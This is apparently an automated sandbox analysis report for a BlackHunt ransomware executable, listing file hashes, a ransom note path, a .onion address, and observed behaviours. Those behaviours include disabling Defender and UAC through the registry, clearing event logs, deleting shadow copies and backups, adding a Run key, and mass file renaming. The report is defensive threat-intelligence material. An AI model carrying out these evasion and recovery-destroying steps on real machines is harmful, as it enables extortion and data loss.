Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:40
Static task
static1
Behavioral task
behavioral1
Sample
6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe
Resource
win10v2004-20231222-en
General
-
Target
6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe
-
Size
707KB
-
MD5
bd832d91e87c94446cac9a4a1faef941
-
SHA1
70350177b274b65b0abfede3b10ebd74dde2fd08
-
SHA256
6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5
-
SHA512
656073224d1fe39295d3434a733ee22b84c86f9713f102f66ae4a5148134d73a2128b5bcd39a26dd8424f1d2bfab667d61d2dada41a6158417129a0d30c729e0
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1E8pvnh:6uaTmkZJ+naie5OTamgEoKxLWHNh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2928 fsutil.exe 2640 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1332 wevtutil.exe 3140 wevtutil.exe 1600 wevtutil.exe 892 wevtutil.exe 1280 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2776 bcdedit.exe 1624 bcdedit.exe 1724 bcdedit.exe 3396 bcdedit.exe -
Renames multiple (2893) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2304 wbadmin.exe 2648 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2628 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\O: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\H: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\V: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\U: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\Y: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\P: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\T: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\X: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\R: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\I: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\S: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\L: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\B: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\M: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\E: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\K: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\J: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\Z: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\N: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened (read-only) \??\Q: 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Makassar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files (x86)\Google\Update\Download\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jre7\lib\applet\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\km\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\#BlackHunt_ReadMe.hta 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\1047x576black.png 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.cpl 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#BlackHunt_ReadMe.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#BlackHunt_Private.key 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1968 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1628 vssadmin.exe 1920 vssadmin.exe 1852 vssadmin.exe 2516 vssadmin.exe 1336 vssadmin.exe 1680 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3824 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2168 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1768 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeRestorePrivilege 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeBackupPrivilege 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeTakeOwnershipPrivilege 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeAuditPrivilege 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeSecurityPrivilege 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeIncBasePriorityPrivilege 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Token: SeBackupPrivilege 2064 wbengine.exe Token: SeRestorePrivilege 2064 wbengine.exe Token: SeSecurityPrivilege 2064 wbengine.exe Token: SeBackupPrivilege 2260 Process not Found Token: SeRestorePrivilege 2260 Process not Found Token: SeAuditPrivilege 2260 Process not Found Token: SeSecurityPrivilege 3140 wevtutil.exe Token: SeBackupPrivilege 3140 wevtutil.exe Token: SeSecurityPrivilege 1600 wevtutil.exe Token: SeBackupPrivilege 1600 wevtutil.exe Token: SeSecurityPrivilege 1280 wevtutil.exe Token: SeBackupPrivilege 1280 wevtutil.exe Token: SeSecurityPrivilege 1332 wevtutil.exe Token: SeBackupPrivilege 1332 wevtutil.exe Token: SeSecurityPrivilege 892 wevtutil.exe Token: SeBackupPrivilege 892 wevtutil.exe Token: SeDebugPrivilege 3824 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2688 wrote to memory of 1204 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 156 PID 2688 wrote to memory of 1204 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 156 PID 2688 wrote to memory of 1204 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 156 PID 2688 wrote to memory of 1204 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 156 PID 2688 wrote to memory of 2156 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 154 PID 2688 wrote to memory of 2156 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 154 PID 2688 wrote to memory of 2156 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 154 PID 2688 wrote to memory of 2156 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 154 PID 2688 wrote to memory of 2256 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 152 PID 2688 wrote to memory of 2256 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 152 PID 2688 wrote to memory of 2256 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 152 PID 2688 wrote to memory of 2256 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 152 PID 1204 wrote to memory of 2360 1204 cmd.exe 150 PID 1204 wrote to memory of 2360 1204 cmd.exe 150 PID 1204 wrote to memory of 2360 1204 cmd.exe 150 PID 2688 wrote to memory of 1028 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 149 PID 2688 wrote to memory of 1028 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 149 PID 2688 wrote to memory of 1028 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 149 PID 2688 wrote to memory of 1028 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 149 PID 2688 wrote to memory of 2828 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 29 PID 2688 wrote to memory of 2828 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 29 PID 2688 wrote to memory of 2828 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 29 PID 2688 wrote to memory of 2828 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 29 PID 2156 wrote to memory of 2840 2156 cmd.exe 146 PID 2156 wrote to memory of 2840 2156 cmd.exe 146 PID 2156 wrote to memory of 2840 2156 cmd.exe 146 PID 2688 wrote to memory of 3004 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 145 PID 2688 wrote to memory of 3004 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 145 PID 2688 wrote to memory of 3004 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 145 PID 2688 wrote to memory of 3004 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 145 PID 2688 wrote to memory of 2816 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 144 PID 2688 wrote to memory of 2816 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 144 PID 2688 wrote to memory of 2816 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 144 PID 2688 wrote to memory of 2816 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 144 PID 2688 wrote to memory of 2988 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 141 PID 2688 wrote to memory of 2988 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 141 PID 2688 wrote to memory of 2988 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 141 PID 2688 wrote to memory of 2988 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 141 PID 2688 wrote to memory of 2636 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 138 PID 2688 wrote to memory of 2636 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 138 PID 2688 wrote to memory of 2636 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 138 PID 2688 wrote to memory of 2636 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 138 PID 2256 wrote to memory of 2912 2256 cmd.exe 137 PID 2256 wrote to memory of 2912 2256 cmd.exe 137 PID 2256 wrote to memory of 2912 2256 cmd.exe 137 PID 2688 wrote to memory of 2808 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 30 PID 2688 wrote to memory of 2808 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 30 PID 2688 wrote to memory of 2808 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 30 PID 2688 wrote to memory of 2808 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 30 PID 2688 wrote to memory of 2696 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 226 PID 2688 wrote to memory of 2696 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 226 PID 2688 wrote to memory of 2696 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 226 PID 2688 wrote to memory of 2696 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 226 PID 2688 wrote to memory of 2652 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 133 PID 2688 wrote to memory of 2652 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 133 PID 2688 wrote to memory of 2652 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 133 PID 2688 wrote to memory of 2652 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 133 PID 2828 wrote to memory of 2784 2828 cmd.exe 134 PID 2828 wrote to memory of 2784 2828 cmd.exe 134 PID 2828 wrote to memory of 2784 2828 cmd.exe 134 PID 2688 wrote to memory of 2720 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 132 PID 2688 wrote to memory of 2720 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 132 PID 2688 wrote to memory of 2720 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 132 PID 2688 wrote to memory of 2720 2688 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe 132 -
System policy modification 1 TTPs 3 IoCs
